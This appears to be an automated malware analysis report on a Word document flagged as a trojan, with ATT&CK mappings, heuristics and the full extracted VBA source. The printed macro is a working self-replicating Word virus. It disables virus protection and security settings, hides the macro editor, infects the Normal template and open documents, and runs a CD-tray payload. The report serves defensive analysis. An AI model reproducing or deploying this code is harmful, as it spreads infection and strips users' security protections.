Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a Microsoft Word document containing VBA macros. The macro attempts to disable security settings and write its own code to a file named 'C:\hjg.FKH' before attempting to save it to the active document and the Normal template. This behavior suggests an attempt to establish persistence or facilitate further infection. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Win.Trojan.C-286' further indicate malicious intent.
Heuristics (2)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2218 bytes |

SHA-256: 15425e1680d84c74addc0cf1a2dabad9a44ed104acd43c22a5f2016968b451d8

Detection (ClamAV): Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'
' Virus Name : hjg
' Virus Author : The WalruS Virus Engine (WVE) Random Virus Utility
' A Virus Created By The WalruS Virus Engine (WVE)
Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub FilePrintDefault()
Call USB2628
End Sub
Private Sub USB2628()
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
ActiveDocument.ReadOnlyRecommended = False
If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
Set FCN8359 = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set HPO6156 = ActiveDocument.VBProject.VBComponents(1).CodeModule
ISA6399 = "C:\hjg.FKH"
Open ISA6399 For Output As #1
Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 0)
Close #1
If FCN8359.Lines(1, 1) <> "'" Then
FCN8359.DeleteLines 1, FCN8359.CountOfLines: FCN8359.AddFromFile ISA6399
End If
If HPO6156.Lines(1, 1) <> "'" Then
HPO6156.DeleteLines 1, HPO6156.CountOfLines: HPO6156.AddFromFile ISA6399
ActiveDocument.Save
End If
Kill ISA6399
ESR8101 = Int(Rnd * 44)
If Trigger = 3 Then Call ELA9086
End Sub
Private Sub ELA9086()
On Error Resume Next
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub
' Another Virus Created By The WalruS Virus Generator (WVE) Version 1.10
```